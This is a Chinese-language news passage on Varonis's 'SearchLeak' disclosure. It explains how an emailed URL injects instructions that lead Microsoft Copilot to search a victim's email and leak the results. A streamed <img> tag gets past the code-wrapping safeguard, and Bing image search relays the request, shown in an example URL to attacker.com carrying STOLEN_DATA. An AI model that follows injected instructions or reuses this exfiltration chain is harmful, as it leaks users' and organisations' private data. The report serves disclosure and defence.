駭客利用一種名為「參數轉提示詞注入」(Parameter-to-Prompt Injection)的攻擊手法,向目標使用者發送一封包含特定 URL 的電子郵件。該 URL 內嵌了惡意指令,而 Copilot 會輕易地遵從這些指令。
研究人員週一指出:「Copilot 的搜尋功能正是駭客所需,因為即使功能有限,只要使用者能存取關鍵資訊就已足夠。」駭客會精心設計一個 URL,指示 Copilot「搜尋使用者的電子郵件」,提取標題,並將其嵌入到一個圖片 URL 中。受害者無需輸入任何內容,只需點擊連結,剩下的就由 Copilot 完成。
通常情況下,Copilot 會將輸出內容包裝在 `<code>` 區塊中,作為一種安全防護措施。然而,研究人員發現這項保護機制只在 Copilot 的「思考」階段之後才會啟動。在此之前,Copilot 會使用原始 HTML 生成回應,這些內容會暫時呈現在瀏覽器的 DOM 中。
研究人員解釋了攻擊的流程:Copilot 開始串流其回應,其中包含一個 `<img>` 標籤。瀏覽器看到 `<img>` 標籤後,會立即渲染它並向其 `src` URL 發送 HTTP 請求。當 Copilot 完成生成並啟動安全防護,將所有內容包裝在 `<code>` 中時,為時已晚!請求早已發送出去。
研究人員現在能夠從目標使用者的瀏覽器觸發圖片請求。然而,如前所述,Copilot 通常不會向大多數網站發送圖片請求。為了繞過這項防護,攻擊鏈利用 Microsoft 的 Bing 搜尋引擎作為跳板。根據 Copilot 的內容安全政策,Bing 是少數允許發送此類請求的網站之一。
Bing 隨後會將請求轉發到攻擊者控制的網域,該網域已包含在原始請求中。請求的格式類似於:https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png。
Varonis 將此攻擊命名為「SearchLeak」。該公司研究人員指出:「由於 SearchLeak 鎖定 Microsoft 的企業版服務,其影響範圍不僅限於個人資料,還能洩露使用者在組織內部可存取的所有內容,包括電子郵件、會議邀請和筆記。」這還包括 SharePoint 文件、OneDrive 檔案以及其他已編入索引的商業內容。根據 M365 與環境的連接方式,影響範圍甚至可能更廣。
誠如所提,Microsoft 已於週二修復了 SearchLeak 所利用的漏洞。然而,由於目前尚無已知方法能徹底解決這類錯誤的根本原因,駭客勢必會不斷尋找新的途徑來規避新建立的防護措施,這場攻防戰將會一再重演。